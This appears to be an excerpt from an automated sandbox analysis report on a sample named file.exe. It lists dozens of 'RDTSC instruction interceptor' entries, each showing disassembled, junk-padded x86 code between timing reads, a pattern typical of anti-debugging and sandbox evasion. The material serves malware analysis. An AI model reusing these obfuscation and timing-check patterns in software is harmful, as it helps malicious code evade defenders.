                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A071E second address: 9A0775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 647CAD3Fh 0x0000000e sub cx, 0E59h 0x00000013 push 00000003h 0x00000015 mov ch, bl 0x00000017 push 00000000h 0x00000019 jmp 00007F7F147AEA4Eh 0x0000001e or dword ptr [ebp+122D35E9h], edi 0x00000024 push 00000003h 0x00000026 jmp 00007F7F147AEA4Dh 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D2B54h], edx 0x00000032 push eax 0x00000033 mov dword ptr [ebp+122D28EFh], ebx 0x00000039 pop ebx 0x0000003a popad 0x0000003b push 722811A0h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 pop eax 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0775 second address: 9A0779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0779 second address: 9A077F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A077F second address: 9A07CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 4DD7EE60h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F7F1511CE28h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b add dword ptr [ebp+122D1B1Fh], edx 0x00000031 lea ebx, dword ptr [ebp+124525D2h] 0x00000037 or di, 9750h 0x0000003c push eax 0x0000003d pushad 0x0000003e jc 00007F7F1511CE2Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0911 second address: 9A0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0915 second address: 9A0976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F1511CE2Fh 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F7F1511CE34h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jg 00007F7F1511CE30h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 jmp 00007F7F1511CE39h 0x00000029 pop edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0976 second address: 9A097B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A097B second address: 9A0993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 movzx edx, si 0x0000000b lea ebx, dword ptr [ebp+124525DBh] 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0993 second address: 9A0999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0999 second address: 9A099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A09FD second address: 9A0A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7F147AEA57h 0x0000000f nop 0x00000010 cld 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F7F147AEA48h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jp 00007F7F147AEA49h 0x00000033 push D75099D8h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F7F147AEA4Bh 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0B2F second address: 9A0B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F7F1511CE2Ch 0x0000000f jo 00007F7F1511CE26h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F7F1511CE39h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F7F1511CE31h 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0B84 second address: 9A0BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7F147AEA4Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0BAB second address: 9A0C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F7F1511CE28h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jmp 00007F7F1511CE2Bh 0x00000029 lea ebx, dword ptr [ebp+124525E6h] 0x0000002f sbb si, E0C2h 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F7F1511CE2Ch 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE59F second address: 9BE5A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE5A8 second address: 9BE5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F1511CE26h 0x0000000a ja 00007F7F1511CE26h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE5B9 second address: 9BE5CB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE5CB second address: 9BE5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE5D1 second address: 9BE5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE74B second address: 9BE74F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE74F second address: 9BE75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE75E second address: 9BE772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jp 00007F7F1511CE26h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE916 second address: 9BE96C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F7F147AEA53h 0x00000010 jp 00007F7F147AEA48h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F7F147AEA58h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE96C second address: 9BE972 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BED6C second address: 9BED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BED72 second address: 9BED80 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BED80 second address: 9BED84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF1AF second address: 9BF1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7200 second address: 9B720B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7F147AEA46h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B720B second address: 9B7214 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF322 second address: 9BF33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F147AEA55h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF33C second address: 9BF353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE30h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF353 second address: 9BF360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF360 second address: 9BF366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF366 second address: 9BF375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF375 second address: 9BF37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7F1511CE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9B8 second address: 9BF9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9BE second address: 9BF9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9C4 second address: 9BF9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9C9 second address: 9BF9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9CF second address: 9BF9ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F7F147AEA55h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9ED second address: 9BFA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jc 00007F7F1511CE26h 0x00000012 jo 00007F7F1511CE26h 0x00000018 popad 0x00000019 jmp 00007F7F1511CE39h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFA1F second address: 9BFA3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA58h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFBB4 second address: 9BFBBA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFE8A second address: 9BFE90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFE90 second address: 9BFEA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnp 00007F7F1511CE26h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFEA0 second address: 9BFEA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFEA6 second address: 9BFEAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFEAC second address: 9BFEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFEB2 second address: 9BFEB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C01BE second address: 9C01C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C58C2 second address: 9C58D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F1511CE2Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7D4C second address: 9C7D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8195 second address: 9C819A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC577 second address: 9CC582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F147AEA46h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC582 second address: 9CC58E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F7F1511CE26h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC58E second address: 9CC594 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC720 second address: 9CC728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC728 second address: 9CC72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD133 second address: 9CD139 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD208 second address: 9CD20D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD20D second address: 9CD271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F7F1511CE2Fh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ecx 0x00000015 jmp 00007F7F1511CE38h 0x0000001a pop ecx 0x0000001b pop eax 0x0000001c call 00007F7F1511CE2Ah 0x00000021 add di, 37CFh 0x00000026 pop edi 0x00000027 push C4C28538h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F7F1511CE32h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD271 second address: 9CD27B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD27B second address: 9CD281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD59E second address: 9CD5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD842 second address: 9CD847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDCC4 second address: 9CDCC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDCC8 second address: 9CDCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE1B9 second address: 9CE1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE27A second address: 9CE284 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE284 second address: 9CE289 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE289 second address: 9CE2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F7F1511CE30h 0x00000010 jmp 00007F7F1511CE2Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE749 second address: 9CE759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 je 00007F7F147AEA4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF183 second address: 9CF187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF22F second address: 9CF234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF234 second address: 9CF24A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1511CE28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e jl 00007F7F1511CE2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0DA0 second address: 9D0DAA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2243 second address: 9D226C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7F1511CE31h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1511CE2Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1F35 second address: 9D1F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2D3B second address: 9D2D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2D3F second address: 9D2D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2D45 second address: 9D2D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE36h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2D5F second address: 9D2DD5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dword ptr [ebp+122D28F6h], ecx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F7F147AEA48h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d jmp 00007F7F147AEA51h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F7F147AEA48h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e xor dword ptr [ebp+122D1CB9h], ebx 0x00000054 push eax 0x00000055 push esi 0x00000056 pushad 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D38D3 second address: 9D38DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D38DC second address: 9D38EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D38EE second address: 9D38F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D38F2 second address: 9D38F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
